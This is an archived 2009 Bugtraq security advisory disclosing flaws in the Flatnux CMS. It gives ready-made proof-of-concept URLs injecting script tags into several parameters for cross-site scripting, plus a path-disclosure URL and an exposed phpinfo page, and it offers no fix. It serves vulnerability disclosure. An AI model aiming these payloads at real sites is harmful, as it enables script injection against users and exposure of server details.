| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 3 Jun 2009 15:51:42 -0600 From: security@...ern0t.net To: bugtraq@...urityfocus.com Subject: [InterN0T] Flatnux 2009-03-27 - XSS Vulnerabilities + More Flatnux - Cross Site Scripting Vulnerabilities + More Version Affected: "2009-03-27" (newest) Info: See website for more information. Credits: InterN0T External Links: http://www.flatnux.altervista.org/ -:: The Advisory ::- Vulnerable Function / ID Calls: mod, user, from, pk & dir (some has to be used in conjunction with other function calls) Cross Site Scripting: 1. http://www.website.tld/flatnux/index.php?mod="><script>alert(0)</script> (anyone) 2. http://www.website.tld/flatnux/index.php?mod=login&op=profile&user="><script>alert(0)</script> (registered users only) 3. http://www.website.tld/flatnux/index.php?opindex=modcont&file=misc/motd.en.php&from="><script>alert(0)</script> (admin only) 4. http://www.website.tld/flatnux/controlcenter.php?mod=controlcenter&op=03_users/20_groups&opmod=insnew_groups&pk="><script>alert(0)</script> (admin only) Path Disclosure: http://www.website.tld/flatnux/index.php?mod=05_Foto&dir=' Information Disclosure: http://www.website.tld/flatnux/sections/none_Control_Center/phpinfo.php -:: Solution ::- I didn't bother to find one, sorry. Reference: http://forum.intern0t.net/intern0t-advisories/1084-intern0t-flatnux-2009-03-27-cross-site-scripting-vulnerabilities-more.html Disclosure Information: - Vulnerabilities found and confirmed between 1st and 3rd June 2009. - Published at InterN0T the 3rd June 2009. - Bugtraq contacted the 3rd June 2009. All of the best, MaXe
Powered by blists - more mailing lists